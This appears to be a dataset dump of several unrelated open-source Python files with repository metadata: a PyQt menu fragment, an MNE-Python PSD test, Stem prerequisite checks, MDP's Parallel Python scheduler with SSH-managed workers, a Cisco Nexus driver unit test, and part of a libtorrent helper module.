self.help_sub_menu = self.menubar.addMenu('Help')
self.about_action = QAction('About', self)
self.about_action.setStatusTip('About the application.')
self.about_action.setShortcut('CTRL+H')
self.about_action.triggered.connect(self.about_dialog.exec_)
self.help_sub_menu.addAction(self.about_action)
self.menubar = QMenuBar(self)
file_menu()
edit_menu()
tools_menu()
help_menu()
def create_statusbar():
self.statusbar = QStatusBar(self)
self.statusbar.showMessage("Ready", 0)
self.about_dialog = AboutDialog(self)
create_menubar()
self.setMenuBar(self.menubar)
create_statusbar()
self.setStatusBar(self.statusbar)
def setup_ui(self):
"""setup the tab widget UI"""
self.tab_widget = QTabWidget()
self.tab_widget.addTab(DesignTab(), "Design")
self.tab_widget.addTab(QWidget(), "Simulation")
self.tab_widget.addTab(QWidget(), "Propellants")
self.layout = QVBoxLayout()
self.layout.addWidget(self.tab_widget)
self.frame = QFrame()
self.frame.setLayout(self.layout)
self.setCentralWidget(self.frame)
| gpl-3.0 | -73,988,300,967,120,670 | 34.086022 | 102 | 0.592706 | false |
nicproulx/mne-python | mne/time_frequency/tests/test_psd.py | 2 | 7360 | import numpy as np
import os.path as op
from numpy.testing import assert_array_almost_equal, assert_raises
from nose.tools import assert_true
from mne import pick_types, Epochs, read_events
from mne.io import RawArray, read_raw_fif
from mne.utils import requires_version, slow_test, run_tests_if_main
from mne.time_frequency import psd_welch, psd_multitaper
base_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_fname = op.join(base_dir, 'test-eve.fif')
@requires_version('scipy', '0.12')
def test_psd():
"""Tests the welch and multitaper PSD."""
raw = read_raw_fif(raw_fname)
picks_psd = [0, 1]
# Populate raw with sinusoids
rng = np.random.RandomState(40)
data = 0.1 * rng.randn(len(raw.ch_names), raw.n_times)
freqs_sig = [8., 50.]
for ix, freq in zip(picks_psd, freqs_sig):
data[ix, :] += 2 * np.sin(np.pi * 2. * freq * raw.times)
first_samp = raw._first_samps[0]
raw = RawArray(data, raw.info)
tmin, tmax = 0, 20 # use a few seconds of data
fmin, fmax = 2, 70 # look at frequencies between 2 and 70Hz
n_fft = 128
# -- Raw --
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
kws_welch = dict(n_fft=n_fft)
kws_mt = dict(low_bias=True)
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(raw, proj=False, **kws)
psds_proj, freqs_proj = func(raw, proj=True, **kws)
assert_true(psds.shape == (len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Is power found where it should be
ixs_max = np.argmax(psds, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj)
# Array input shouldn't work
assert_raises(ValueError, func, raw[:3, :20][0])
# test n_per_seg in psd_welch (and padding)
psds1, freqs1 = psd_welch(raw, proj=False, n_fft=128, n_per_seg=128,
**kws_psd)
psds2, freqs2 = psd_welch(raw, proj=False, n_fft=256, n_per_seg=128,
**kws_psd)
assert_true(len(freqs1) == np.floor(len(freqs2) / 2.))
assert_true(psds1.shape[-1] == np.floor(psds2.shape[-1] / 2.))
# tests ValueError when n_per_seg=None and n_fft > signal length
kws_psd.update(dict(n_fft=tmax * 1.1 * raw.info['sfreq']))
assert_raises(ValueError, psd_welch, raw, proj=False, n_per_seg=None,
**kws_psd)
# ValueError when n_overlap > n_per_seg
kws_psd.update(dict(n_fft=128, n_per_seg=64, n_overlap=90))
assert_raises(ValueError, psd_welch, raw, proj=False, **kws_psd)
# -- Epochs/Evoked --
events = read_events(event_fname)
events[:, 0] -= first_samp
tmin, tmax, event_id = -0.5, 0.5, 1
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks_psd,
proj=False, preload=True, baseline=None)
evoked = epochs.average()
tmin_full, tmax_full = -1, 1
epochs_full = Epochs(raw, events[:10], event_id, tmin_full, tmax_full,
picks=picks_psd, proj=False, preload=True,
baseline=None)
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(
epochs[:1], proj=False, **kws)
psds_proj, freqs_proj = func(
epochs[:1], proj=True, **kws)
psds_f, freqs_f = func(
epochs_full[:1], proj=False, **kws)
# this one will fail if you add for example 0.1 to tmin
assert_array_almost_equal(psds, psds_f, 27)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj, 27)
# Is power found where it should be
ixs_max = np.argmax(psds.mean(0), axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
assert_true(psds.shape == (1, len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Array input shouldn't work
assert_raises(ValueError, func, epochs.get_data())
# Testing evoked (doesn't work w/ compute_epochs_psd)
psds_ev, freqs_ev = func(
evoked, proj=False, **kws)
psds_ev_proj, freqs_ev_proj = func(
evoked, proj=True, **kws)
# Is power found where it should be
ixs_max = np.argmax(psds_ev, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs_ev))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds_ev, psds_ev_proj, 27)
assert_true(psds_ev.shape == (len(kws['picks']), len(freqs)))
@slow_test
@requires_version('scipy', '0.12')
def test_compares_psd():
"""Test PSD estimation on raw for plt.psd and scipy.signal.welch."""
raw = read_raw_fif(raw_fname)
exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more
# picks MEG gradiometers
picks = pick_types(raw.info, meg='grad', eeg=False, stim=False,
exclude=exclude)[:2]
tmin, tmax = 0, 10 # use the first 60s of data
fmin, fmax = 2, 70 # look at frequencies between 5 and 70Hz
n_fft = 2048
# Compute psds with the new implementation using Welch
psds_welch, freqs_welch = psd_welch(raw, tmin=tmin, tmax=tmax, fmin=fmin,
fmax=fmax, proj=False, picks=picks,
n_fft=n_fft, n_jobs=1)
# Compute psds with plt.psd
start, stop = raw.time_as_index([tmin, tmax])
data, times = raw[picks, start:(stop + 1)]
from matplotlib.pyplot import psd
out = [psd(d, Fs=raw.info['sfreq'], NFFT=n_fft) for d in data]
freqs_mpl = out[0][1]
psds_mpl = np.array([o[0] for o in out])
mask = (freqs_mpl >= fmin) & (freqs_mpl <= fmax)
freqs_mpl = freqs_mpl[mask]
psds_mpl = psds_mpl[:, mask]
assert_array_almost_equal(psds_welch, psds_mpl)
assert_array_almost_equal(freqs_welch, freqs_mpl)
assert_true(psds_welch.shape == (len(picks), len(freqs_welch)))
assert_true(psds_mpl.shape == (len(picks), len(freqs_mpl)))
assert_true(np.sum(freqs_welch < 0) == 0)
assert_true(np.sum(freqs_mpl < 0) == 0)
assert_true(np.sum(psds_welch < 0) == 0)
assert_true(np.sum(psds_mpl < 0) == 0)
run_tests_if_main()
| bsd-3-clause | -7,658,759,830,892,655,000 | 37.736842 | 77 | 0.588179 | false |
ewongbb/stem | stem/prereq.py | 1 | 4914 | # Copyright 2012-2017, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Checks for stem dependencies. We require python 2.6 or greater (including the
3.x series), but note we'll be bumping our requirements to python 2.7 in stem
2.0. Other requirements for complete functionality are...
* cryptography module
* validating descriptor signature integrity
::
check_requirements - checks for minimum requirements for running stem
is_python_3 - checks if python 3.0 or later is available
is_crypto_available - checks if the cryptography module is available
"""
import inspect
import sys
try:
# added in python 3.2
from functools import lru_cache
except ImportError:
from stem.util.lru_cache import lru_cache
CRYPTO_UNAVAILABLE = "Unable to import the cryptography module. Because of this we'll be unable to verify descriptor signature integrity. You can get cryptography from: https://pypi.python.org/pypi/cryptography"
PYNACL_UNAVAILABLE = "Unable to import the pynacl module. Because of this we'll be unable to verify descriptor ed25519 certificate integrity. You can get pynacl from https://pypi.python.org/pypi/PyNaCl/"
def check_requirements():
"""
Checks that we meet the minimum requirements to run stem. If we don't then
this raises an ImportError with the issue.
:raises: **ImportError** with the problem if we don't meet stem's
requirements
"""
major_version, minor_version = sys.version_info[0:2]
if major_version < 2 or (major_version == 2 and minor_version < 6):
raise ImportError('stem requires python version 2.6 or greater')
def _is_python_26():
"""
Checks if we're running python 2.6. This isn't for users as it'll be removed
in stem 2.0 (when python 2.6 support goes away).
:returns: **True** if we're running python 2.6, **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version == 2 and minor_version == 6
def is_python_27():
"""
Checks if we're running python 2.7 or above (including the 3.x series).
.. deprecated:: 1.5.0
Function lacks much utility and will be eventually removed.
:returns: **True** if we meet this requirement and **False** otherwise
"""
major_version, minor_version = sys.version_info[0:2]
return major_version > 2 or (major_version == 2 and minor_version >= 7)
def is_python_3():
"""
Checks if we're in the 3.0 - 3.x range.
:returns: **True** if we meet this requirement and **False** otherwise
"""
return sys.version_info[0] == 3
@lru_cache()
def is_crypto_available():
"""
Checks if the cryptography functions we use are available. This is used for
verifying relay descriptor signatures.
:returns: **True** if we can use the cryptography module and **False**
otherwise
"""
from stem.util import log
try:
from cryptography.utils import int_from_bytes, int_to_bytes
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.serialization import load_der_public_key
if not hasattr(rsa.RSAPrivateKey, 'sign'):
raise ImportError()
return True
except ImportError:
log.log_once('stem.prereq.is_crypto_available', log.INFO, CRYPTO_UNAVAILABLE)
return False
@lru_cache()
def is_mock_available():
"""
Checks if the mock module is available. In python 3.3 and up it is a builtin
unittest module, but before this it needed to be `installed separately
<https://pypi.python.org/pypi/mock/>`_. Imports should be as follows....
::
try:
# added in python 3.3
from unittest.mock import Mock
except ImportError:
from mock import Mock
:returns: **True** if the mock module is available and **False** otherwise
"""
try:
# checks for python 3.3 version
import unittest.mock
return True
except ImportError:
pass
try:
import mock
# check for mock's patch.dict() which was introduced in version 0.7.0
if not hasattr(mock.patch, 'dict'):
raise ImportError()
# check for mock's new_callable argument for patch() which was introduced in version 0.8.0
if 'new_callable' not in inspect.getargspec(mock.patch).args:
raise ImportError()
return True
except ImportError:
return False
@lru_cache()
def _is_pynacl_available():
"""
Checks if the pynacl functions we use are available. This is used for
verifying ed25519 certificates in relay descriptor signatures.
:returns: **True** if we can use pynacl and **False** otherwise
"""
from stem.util import log
try:
from nacl import encoding
from nacl import signing
return True
except ImportError:
log.log_once('stem.prereq._is_pynacl_available', log.INFO, PYNACL_UNAVAILABLE)
return False
| lgpl-3.0 | -1,769,451,857,329,862,700 | 27.241379 | 211 | 0.712658 | false |
ME-ICA/me-ica | meica.libs/mdp/parallel/pp_support.py | 1 | 13771 | """
Adapters for the Parallel Python library (http://www.parallelpython.com).
The PPScheduler class uses an existing pp scheduler and is a simple adapter.
LocalPPScheduler includes the creation of a local pp scheduler.
NetworkPPScheduler includes the management of the remote slaves via SSH.
"""
from __future__ import with_statement
import sys
import os
import time
import subprocess
import signal
import traceback
import tempfile
import scheduling
import pp
import mdp
TEMPDIR_PREFIX='pp4mdp-monkeypatch.'
def _monkeypatch_pp(container_dir):
"""Apply a hack for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=620551.
Importing numpy fails because the parent directory of the slave
script (/usr/share/pyshared) is added to the begging of sys.path.
This is a temporary fix until parallel python or the way it is
packaged in debian is changed.
This function monkey-patches the ppworker module and changes the
path to the slave script. A temporary directory is created and the
worker script is copied there.
The temporary directory should be automatically removed when this
module is destroyed.
XXX: remove this when parallel python or the way it is packaged in debian is changed.
"""
import os.path, shutil
# this part copied from pp.py, should give the same result hopefully
ppworker = os.path.join(os.path.dirname(os.path.abspath(pp.__file__)),
'ppworker.py')
global _ppworker_dir
_ppworker_dir = mdp.utils.TemporaryDirectory(prefix=TEMPDIR_PREFIX, dir=container_dir)
ppworker3 = os.path.join(_ppworker_dir.name, 'ppworker.py')
shutil.copy(ppworker, ppworker3)
mdp._pp_worker_command = pp._Worker.command[:]
try:
pp._Worker.command[pp._Worker.command.index(ppworker)] = ppworker3
except TypeError:
# pp 1.6.0 compatibility
pp._Worker.command = pp._Worker.command.replace(ppworker, ppworker3)
if hasattr(mdp.config, 'pp_monkeypatch_dirname'):
_monkeypatch_pp(mdp.config.pp_monkeypatch_dirname)
class PPScheduler(scheduling.Scheduler):
"""Adaptor scheduler for the parallel python scheduler.
This scheduler is a simple wrapper for a pp server. A pp server instance
has to be provided.
"""
def __init__(self, ppserver, max_queue_length=1,
result_container=None, verbose=False):
"""Initialize the scheduler.
ppserver -- Parallel Python Server instance.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True to get progress reports from the scheduler.
"""
if result_container is None:
result_container = scheduling.ListResultContainer()
super(PPScheduler, self).__init__(result_container=result_container,
verbose=verbose)
self.ppserver = ppserver
self.max_queue_length = max_queue_length
def _process_task(self, data, task_callable, task_index):
"""Non-blocking processing of tasks.
Depending on the scheduler state this function is non-blocking or
blocking. One reason for blocking can be a full task-queue.
"""
task = (data, task_callable.fork(), task_index)
def execute_task(task):
"""Call the first args entry and return the return value."""
data, task_callable, task_index = task
task_callable.setup_environment()
return task_callable(data), task_index
while True:
if len(self.ppserver._Server__queue) > self.max_queue_length:
# release lock for other threads and wait
self._lock.release()
time.sleep(0.5)
self._lock.acquire()
else:
# release lock to enable result storage
self._lock.release()
# the inner tuple is a trick to prevent introspection by pp
# this forces pp to simply pickle the object
self.ppserver.submit(execute_task, args=(task,),
callback=self._pp_result_callback)
break
def _pp_result_callback(self, result):
"""Calback method for pp to unpack the result and the task id.
This method then calls the normal _store_result method.
"""
if result is None:
result = (None, None)
self._store_result(*result)
def _shutdown(self):
"""Call destroy on the ppserver."""
self.ppserver.destroy()
class LocalPPScheduler(PPScheduler):
"""Uses a local pp server to distribute the work across cpu cores.
The pp server is created automatically instead of being provided by the
user (in contrast to PPScheduler).
"""
def __init__(self, ncpus="autodetect", max_queue_length=1,
result_container=None, verbose=False):
"""Create an internal pp server and initialize the scheduler.
ncpus -- Integer or 'autodetect', specifies the number of processes
used.
max_queue_length -- How long the queue can get before add_task blocks.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True to get progress reports from the scheduler.
"""
ppserver = pp.Server(ncpus=ncpus)
super(LocalPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
# default secret
SECRET = "rosebud"
class NetworkPPScheduler(PPScheduler):
"""Scheduler which can manage pp remote servers (requires SSH).
The remote slave servers are automatically started and killed at the end.
Since the slaves are started via SSH this schduler does not work on normal
Windows systems. On such systems you can start the pp slaves
manually and then use the standard PPScheduler.
"""
def __init__(self, max_queue_length=1,
result_container=None,
verbose=False,
remote_slaves=None,
source_paths=None,
port=50017,
secret=SECRET,
nice=-19,
timeout=3600,
n_local_workers=0,
slave_kill_filename=None,
remote_python_executable=None):
"""Initialize the remote slaves and create the internal pp scheduler.
result_container -- ResultContainer used to store the results.
ListResultContainer by default.
verbose -- If True to get progress reports from the scheduler.
remote_slaves -- List of tuples, the first tuple entry is a string
containing the name or IP adress of the slave, the second entry
contains the number of processes (i.e. the pp ncpus parameter).
The second entry can be None to use 'autodetect'.
source_paths -- List of paths that will be appended to sys.path in the
slaves.
n_local_workers -- Value of ncpus for this machine.
secret -- Secret password to secure the remote slaves.
slave_kill_filename -- Filename (including path) where a list of the
remote slave processes should be stored. Together with the
'kill_slaves' function this makes it possible to quickly all
remote slave processes in case something goes wrong.
If None, a tempfile is created.
"""
self._remote_slaves = remote_slaves
self._running_remote_slaves = None # list of strings 'address:port'
# list with processes for the ssh connections to the slaves
self._ssh_procs = None
self._remote_pids = None # list of the pids of the remote servers
self._port = port
if slave_kill_filename is None:
slave_kill_file = tempfile.mkstemp(prefix='MDPtmp-')[1]
self.slave_kill_file = slave_kill_file
self._secret = secret
self._slave_nice = nice
self._timeout = timeout
if not source_paths:
self._source_paths = []
else:
self._source_paths = source_paths
if remote_python_executable is None:
remote_python_executable = sys.executable
self._python_executable = remote_python_executable
module_file = os.path.abspath(__file__)
self._script_path = os.path.dirname(module_file)
self.verbose = verbose
# start ppserver
self._start_slaves()
ppslaves = tuple(["%s:%d" % (address, self._port)
for address in self._running_remote_slaves])
ppserver = pp.Server(ppservers=ppslaves,
ncpus=n_local_workers,
secret=self._secret)
super(NetworkPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
def _shutdown(self):
"""Shutdown all slaves."""
for ssh_proc in self._ssh_procs:
os.kill(ssh_proc.pid, signal.SIGQUIT)
super(NetworkPPScheduler, self)._shutdown()
if self.verbose:
print "All slaves shut down."
def start_slave(self, address, ncpus="autodetect"):
"""Start a single remote slave.
The return value is a tuple of the ssh process handle and
the remote pid.
"""
try:
print "starting slave " + address + " ..."
proc = subprocess.Popen(["ssh","-T", "%s" % address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("cd %s\n" % self._script_path)
cmd = (self._python_executable +
" pp_slave_script.py %d %d %d %s %d" %
(self._slave_nice, self._port, self._timeout, self._secret,
ncpus))
proc.stdin.write(cmd + "\n")
# send additional information to the remote process
proc.stdin.write(self._python_executable + "\n")
for sys_path in self._source_paths:
proc.stdin.write(sys_path + "\n")
proc.stdin.write("_done_" + "\n")
# print status message from slave
sys.stdout.write(address + ": " + proc.stdout.readline())
# get PID for remote slave process
pid = None
if self.verbose:
print "*** output from slave %s ***" % address
while pid is None:
# the slave process might first output some hello message
try:
value = proc.stdout.readline()
if self.verbose:
print value
pid = int(value)
except ValueError:
pass
if self.verbose:
print "*** output end ***"
return (proc, pid)
except:
print "Initialization of slave %s has failed." % address
traceback.print_exc()
return None
def _start_slaves(self):
"""Start remote slaves.
The slaves that could be started are stored in a textfile, in the form
name:port:pid
"""
with open(self.slave_kill_file, 'w') as slave_kill_file:
self._running_remote_slaves = []
self._remote_pids = []
self._ssh_procs = []
for (address, ncpus) in self._remote_slaves:
ssh_proc, pid = self.start_slave(address, ncpus=ncpus)
if pid is not None:
slave_kill_file.write("%s:%d:%d\n" %
(address, pid, ssh_proc.pid))
self._running_remote_slaves.append(address)
self._remote_pids.append(pid)
self._ssh_procs.append(ssh_proc)
def kill_slaves(slave_kill_filename):
"""Kill all remote slaves which are stored in the given file.
This functions is only meant for emergency situations, when something
went wrong and the slaves have to be killed manually.
"""
with open(slave_kill_filename) as tempfile:
for line in tempfile:
address, pid, ssh_pid = line.split(":")
pid = int(pid)
ssh_pid = int(ssh_pid)
# open ssh connection to to kill remote slave
proc = subprocess.Popen(["ssh","-T", address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("kill %d\n" % pid)
proc.stdin.flush()
# kill old ssh connection
try:
os.kill(ssh_pid, signal.SIGKILL)
except:
pass
# a kill might prevent the kill command transmission
# os.kill(proc.pid, signal.SIGQUIT)
print "killed slave " + address + " (pid %d)" % pid
print "all slaves killed."
if __name__ == "__main__":
if len(sys.argv) == 2:
kill_slaves(sys.argv[1])
else:
sys.stderr.write("usage: %s slave_list.txt\n" % __file__)
| lgpl-2.1 | 7,051,554,097,536,873,000 | 39.622419 | 90 | 0.584053 | false |
nikolay-fedotov/networking-cisco | networking_cisco/tests/unit/ml2/drivers/cisco/nexus/test_cisco_nexus.py | 1 | 7977 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import mock
from oslo_utils import importutils
import testtools
from networking_cisco.plugins.ml2.drivers.cisco.nexus import (
nexus_network_driver)
from networking_cisco.plugins.ml2.drivers.cisco.nexus import constants
from networking_cisco.plugins.ml2.drivers.cisco.nexus import exceptions
from networking_cisco.plugins.ml2.drivers.cisco.nexus import mech_cisco_nexus
from networking_cisco.plugins.ml2.drivers.cisco.nexus import nexus_db_v2
from neutron.common import constants as n_const
from neutron.extensions import portbindings
from neutron.plugins.ml2 import driver_api as api
from neutron.tests.unit import testlib_api
NEXUS_IP_ADDRESS = '1.1.1.1'
NEXUS_IP_ADDRESS_PC = '2.2.2.2'
NEXUS_IP_ADDRESS_DUAL = '3.3.3.3'
HOST_NAME_1 = 'testhost1'
HOST_NAME_2 = 'testhost2'
HOST_NAME_PC = 'testpchost'
HOST_NAME_DUAL = 'testdualhost'
INSTANCE_1 = 'testvm1'
INSTANCE_2 = 'testvm2'
INSTANCE_PC = 'testpcvm'
INSTANCE_DUAL = 'testdualvm'
NEXUS_PORT_1 = 'ethernet:1/10'
NEXUS_PORT_2 = 'ethernet:1/20'
NEXUS_PORTCHANNELS = 'portchannel:2'
NEXUS_DUAL = 'ethernet:1/3,portchannel:2'
VLAN_ID_1 = 267
VLAN_ID_2 = 265
VLAN_ID_PC = 268
VLAN_ID_DUAL = 269
DEVICE_OWNER = 'compute:test'
NEXUS_SSH_PORT = '22'
PORT_STATE = n_const.PORT_STATUS_ACTIVE
NETWORK_TYPE = 'vlan'
NEXUS_DRIVER = ('networking_cisco.plugins.ml2.drivers.cisco.nexus.'
'nexus_network_driver.CiscoNexusDriver')
class FakeNetworkContext(object):
"""Network context for testing purposes only."""
def __init__(self, segment_id):
self._network_segments = {api.SEGMENTATION_ID: segment_id,
api.NETWORK_TYPE: NETWORK_TYPE}
@property
def network_segments(self):
return self._network_segments
class FakePortContext(object):
"""Port context for testing purposes only."""
def __init__(self, device_id, host_name, network_context):
self._port = {
'status': PORT_STATE,
'device_id': device_id,
'device_owner': DEVICE_OWNER,
portbindings.HOST_ID: host_name,
portbindings.VIF_TYPE: portbindings.VIF_TYPE_OVS
}
self._network = network_context
self._segment = network_context.network_segments
@property
def current(self):
return self._port
@property
def network(self):
return self._network
@property
def bottom_bound_segment(self):
return self._segment
class TestCiscoNexusDevice(testlib_api.SqlTestCase):
"""Unit tests for Cisco ML2 Nexus device driver."""
TestConfigObj = collections.namedtuple(
'TestConfigObj',
'nexus_ip_addr host_name nexus_port instance_id vlan_id')
test_configs = {
'test_config1': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_1,
NEXUS_PORT_1,
INSTANCE_1,
VLAN_ID_1),
'test_config2': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_2,
NEXUS_PORT_2,
INSTANCE_2,
VLAN_ID_2),
'test_config_portchannel': TestConfigObj(
NEXUS_IP_ADDRESS_PC,
HOST_NAME_PC,
NEXUS_PORTCHANNELS,
INSTANCE_PC,
VLAN_ID_PC),
'test_config_dual': TestConfigObj(
NEXUS_IP_ADDRESS_DUAL,
HOST_NAME_DUAL,
NEXUS_DUAL,
INSTANCE_DUAL,
VLAN_ID_DUAL),
}
def setUp(self):
"""Sets up mock ncclient, and switch and credentials dictionaries."""
super(TestCiscoNexusDevice, self).setUp()
# Use a mock netconf client
mock_ncclient = mock.Mock()
mock.patch.object(nexus_network_driver.CiscoNexusDriver,
'_import_ncclient',
return_value=mock_ncclient).start()
def new_nexus_init(mech_instance):
mech_instance.driver = importutils.import_object(NEXUS_DRIVER)
mech_instance._nexus_switches = {}
for name, config in TestCiscoNexusDevice.test_configs.items():
ip_addr = config.nexus_ip_addr
host_name = config.host_name
nexus_port = config.nexus_port
mech_instance._nexus_switches[(ip_addr,
host_name)] = nexus_port
mech_instance._nexus_switches[(ip_addr,
'ssh_port')] = NEXUS_SSH_PORT
mech_instance._nexus_switches[(ip_addr,
constants.USERNAME)] = 'admin'
mech_instance._nexus_switches[(ip_addr,
constants.PASSWORD)] = 'password'
mech_instance.driver.nexus_switches = (
mech_instance._nexus_switches)
mock.patch.object(mech_cisco_nexus.CiscoNexusMechanismDriver,
'__init__', new=new_nexus_init).start()
self._cisco_mech_driver = (mech_cisco_nexus.
CiscoNexusMechanismDriver())
def _create_delete_port(self, port_config):
"""Tests creation and deletion of a virtual port."""
nexus_ip_addr = port_config.nexus_ip_addr
host_name = port_config.host_name
nexus_port = port_config.nexus_port
instance_id = port_config.instance_id
vlan_id = port_config.vlan_id
network_context = FakeNetworkContext(vlan_id)
port_context = FakePortContext(instance_id, host_name,
network_context)
self._cisco_mech_driver.update_port_precommit(port_context)
self._cisco_mech_driver.update_port_postcommit(port_context)
for port_id in nexus_port.split(','):
bindings = nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
self.assertEqual(len(bindings), 1)
self._cisco_mech_driver.delete_port_precommit(port_context)
self._cisco_mech_driver.delete_port_postcommit(port_context)
for port_id in nexus_port.split(','):
with testtools.ExpectedException(
exceptions.NexusPortBindingNotFound):
nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
def test_create_delete_ports(self):
"""Tests creation and deletion of two new virtual Ports."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config1'])
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config2'])
def test_create_delete_portchannel(self):
"""Tests creation of a port over a portchannel."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_portchannel'])
def test_create_delete_dual(self):
"""Tests creation and deletion of dual ports for single server"""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_dual'])
| apache-2.0 | -1,957,225,653,470,041,300 | 35.591743 | 79 | 0.598471 | false |
alfa-addon/addon | plugin.video.alfa/lib/python_libtorrent/python_libtorrent/functions.py | 1 | 10908 | #-*- coding: utf-8 -*-
'''
python-libtorrent for Kodi (script.module.libtorrent)
Copyright (C) 2015-2016 DiMartino, srg70, RussakHH, aisman
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
from __future__ import absolute_import
from builtins import object
import sys
PY3 = False
if sys.version_info[0] >= 3: PY3 = True; unicode = str; unichr = chr; long = int
import time
import xbmc, xbmcgui, xbmcaddon
from .net import HTTP
from core import filetools ### Alfa
from core import ziptools
from platformcode import config ### Alfa
#__libbaseurl__ = "https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
#__settings__ = xbmcaddon.Addon(id='script.module.libtorrent')
#__version__ = __settings__.getAddonInfo('version')
#__plugin__ = __settings__.getAddonInfo('name') + " v." + __version__
#__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
# 'script.module.libtorrent', 'icon.png')
#__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
__version__ = '2.0.2' ### Alfa
__plugin__ = "python-libtorrent v.2.0.2" ### Alfa
__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
'plugin.video.alfa', 'icon.png') ### Alfa
#__language__ = __settings__.getLocalizedString ### Alfa
#from python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
from lib.python_libtorrent.python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
def log(msg):
if PY3:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGINFO )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGINFO )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGINFO )
else:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGNOTICE )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGNOTICE )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGNOTICE )
def getSettingAsBool(setting):
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
